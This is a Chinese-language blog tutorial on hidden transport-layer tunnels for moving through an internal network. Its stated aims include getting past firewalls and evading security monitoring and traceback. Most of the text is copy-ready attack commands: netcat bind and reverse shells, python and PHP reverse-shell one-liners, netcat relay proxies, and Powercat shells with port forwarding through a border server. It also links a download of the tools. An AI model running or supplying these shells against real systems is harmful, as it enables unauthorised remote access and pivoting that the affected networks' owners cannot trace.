内网安全 隐藏通信隧道技术——传输层.(遨游于 内网任何主机)
隐藏通信隧道技术.
隐藏通信隧道就是一种 绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上.
目录:
传输层:TCP隧道、UDP隧道、常规端口转发.(这里我演示的是 TCP隧道.)
(3)如果目标主机上没有 Netcat,可以利用 python 反向获取 shell.
(4)目标主机上没有 Netcat,可以 PHP 反向获取 shell.
(3)利用 Powercat 进行转发(边界服务器为跳板,跳到内网别的主机上.)
当我们内网收集完信息完,就有进行下一步判断 然后做隧道通信.
(1)进出口流量是否连通的判断,是否出得去,进得来.
(2)在非受信任的网络中实现安全的数据传输.
(3)使用隐蔽的手段逃避安全监测措施和溯源追踪.
常用的隧道有以下:
网络层:IPv6隧道、ICMP隧道、GRE隧道.
传输层:TCP隧道、UDP隧道、常规端口转发.
应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道.
工具下载:
隧道工具 链接:https://pan.baidu.com/s/1tRNwmhOPyj5kwNgKCD6aCA
提取码:tian
免责声明:
严禁利用本文章中所提到的工具和技术进行非法攻击,否则后果自负,上传者不承担任何责任。
第一步:内网连通性判断.(判断协议能不能通过防火墙.)
用 TCP 协议进行判断有没有连通性.
nc -zv IP 端口号
第二步:搭建 传输层 隧道.
传输层:TCP隧道、UDP隧道、常规端口转发.(这里我演示的是 TCP隧道.)
利用 Netcat 工具.
(1)正向连接(客户端获取服务器的shell.)
外网 攻击机.(IP:192.168.1.103)
nc 【目标的IP地址】 【端口号】
边界服务器 执行.(IP:192.168.1.105)
nc -lvp 4444 -e /bin/sh //linux(4444是端口)
nc -lvp 4444 -e C:\WINDOWS\system32\cmd.exe //windows(4444是端口)
隧道 搭建完成.( kali IP:192.168.1.103)
(2)反向连接.(服务器获取客户端的shell)
外网 攻击机.(IP:192.168.1.103)
nc -lvp 【端口号】
边界服务器 执行.(IP:192.168.1.105)
nc 【外网的IP地址】 【端口号】 -e C:\WINDOWS\system32\cmd.exe
隧道 搭建完成.( kali IP:192.168.1.103)
(3)如果目标主机上没有 Netcat,可以利用 python 反向获取 shell.
外网 攻击机.(IP:192.168.1.103)
Nc -lvp 2222 //监听2222端口.
边界服务器 执行.(IP:192.168.1.104 和 1.1.1.18)( 记得改目标IP地址 和 端口号)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.103",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
隧道 搭建完成.( kali IP:192.168.1.103)
(4)目标主机上没有 Netcat,可以 PHP 反向获取 shell.
外网 攻击机.(IP:192.168.1.103)
Nc -lvp 2222 //监听2222端口.
边界服务器 执行.(IP:192.168.1.104 和 1.1.1.18)( 记得改目标IP地址 和 端口号)
php -r '$sock=fsockopen("192.168.1.103",2222);exec("/bin/sh -i <&3 >&3 2>&3");'
隧道 搭建完成.( kali IP:192.168.1.103)
(5)内网代理:
外网 攻击机.(IP:192.168.1.104)
nc -lvp 3333
边界服务器 执行.(IP:192.168.1.106 和 192.168.1.18 )
nc -v 【外网的IP地址】 3333 -c “nc -v 【内网的IP地址】 3333”
内网主机 执行.(IP:1.1.1.22)( 记得改目标IP地址 和 端口号)
nc -lvp 3333 -e /bin/sh
内网代理隧道 搭建完成.( kali IP:192.168.1.104)
利用 Powercat 工具.
(1)正向连接.
边界服务器 执行.(IP:192.168.1.106)
powercat -l -p 8080 -e /bin/sh //linux(8080是端口)
powercat -l -p 8080 -e C:\WINDOWS\system32\cmd.exe //windows(8080是端口)
外网 攻击机.(IP:192.168.1.107)
nc (边界服务器的IP地址) 8080 -vv
正向连接隧道 搭建完成.( kali IP:192.168.1.107)
(2)反向连接.
外网 攻击机.(IP:192.168.1.107)
nc -l -p 8080 -vv
边界服务器 执行.(IP:192.168.1.106)
powercat -c (外网的 IP 地址) -p 8080 -v -e /bin/sh //linux(8080是端口)
powercat -c(外网的 IP 地址) -p 8080 -v -e C:\WINDOWS\system32\cmd.exe //windows(8080是端口)
反向连接隧道 搭建完成.( kali IP:192.168.1.107)
(3)利用 Powercat 进行转发(边界服务器为跳板,跳到内网别的主机上.)
内网主机 执行.(IP:1.1.1.33)
powercat -l -v -p 9999 -e /bin/sh
边界服务器 执行.(IP:192.168.1.106)
powercat -l -v -p 8000 -r tcp:(内网的 IP 地址):9999
外网 攻击机.(kali:192.168.1.107)
nc (边界服务器 IP 地址) 8000 -vv
利用 Powercat 进行转发 隧道搭建完成.( kali IP:192.168.1.107)
相关文章
- 8.Java 加解密技术系列之 PBE
- VT 虚拟化技术
- iOS社交app技术合伙人笔试题
- 技术分享连载(九十六)
- 面试 | Python 自动化测试技术面试真题
- 瑞数信息再次入选Gartner《2022年中国ICT技术成熟度曲线报告》云安全示例厂商
- 基于大数据分析的安全管理平台技术研究及应用
- 基于大数据分析的安全管理平台技术研究及应用【摘录】
- 后端技术大全(69个点)。
- 《WEB安全渗透测试》(28)Burp Collaborator-dnslog外带技术
- 视频通信与直播方面的技术调研
- 《敏捷制造——敏捷集成基础结构设计》——2.2 敏捷企业集成基础结构建模技术
- 《Android安全技术揭秘与防范》—第8章8.2节常用的Hook工具
- 《数据库技术原理与应用教程(第2版)》——第一篇 基础篇 第1章 数据、数据管理与数据处理 1.1 概述
- WAPI产业联盟:中国两项近场通信NFC安全技术成国际标准
- 物联网技术已入民生,你跟上潮流了吗?
- 物联网技术或助力桶装水市场扩展
- 国家环保物联网技术研究应用工程技术中心即将验收
- 《云计算架构技术与实践》连载15:2.3.2~2.3.6 弹性伸缩、高性能、用户体验、高安全、高可靠
- 网络+技术:打造安全可信的政企云服务
- 企业现在需要的10项热门安全技术
- 物联网技术在智能制造中的应用场景
- 无人零售掀起识别技术风潮,但它真的安全值得信赖吗?
- 安全与技术并重,开源数据仓库命运如何?
- 中国5G领到“小学课本”:5G技术研发试验第二阶段技术规范发布
- AOP技术应用于安全防御与漏洞修复